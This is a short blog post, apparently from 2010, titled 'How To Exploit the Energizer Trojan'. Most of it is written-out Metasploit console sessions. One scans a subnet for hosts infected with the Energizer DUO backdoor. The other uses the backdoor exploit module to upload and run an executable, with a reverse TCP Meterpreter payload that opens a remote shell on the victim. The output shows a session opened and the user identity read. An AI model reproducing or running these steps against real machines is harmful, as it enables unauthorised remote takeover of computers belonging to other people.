Wednesday, 10 March 2010

How To Exploit the Energizer Trojan

As of release version 8749, you can now use Metasploit to locate infected systems on your local network using the following commands.

# msfconsole
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set RHOSTS 10.0.0.0/24
msf auxiliary(energizer_duo_detect) > set THREADS 256
msf auxiliary(energizer_duo_detect) > run

[*] 10.0.0.23:7777 FOUND: [["F", "AUTOEXEC.BAT"] .......

To take things a step further and gain access to a system running this backdoor, use the energizer_duo_payload module:

msf > use exploit/windows/backdoor/energizer_duo_payload
msf exploit(energizer_duo_payload) > set RHOST 10.0.0.23
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(energizer_duo_payload) > set LHOST 10.0.0.253
msf exploit(energizer_duo_payload) > exploit

[*] Started reverse handler on 10.0.0.23:4444

[*] Trying to upload C:\NTL0ZTL4DhVL.exe...

[*] Trying to execute C:\NTL0ZTL4DhVL.exe...

[*] Sending stage (747008 bytes)

[*] Meterpreter session 1 opened (10.0.0.23:4444 -> 10.0.0.253:1200)

meterpreter > getuid
Server username: HACKME\TestUser

No comments:

Post a Comment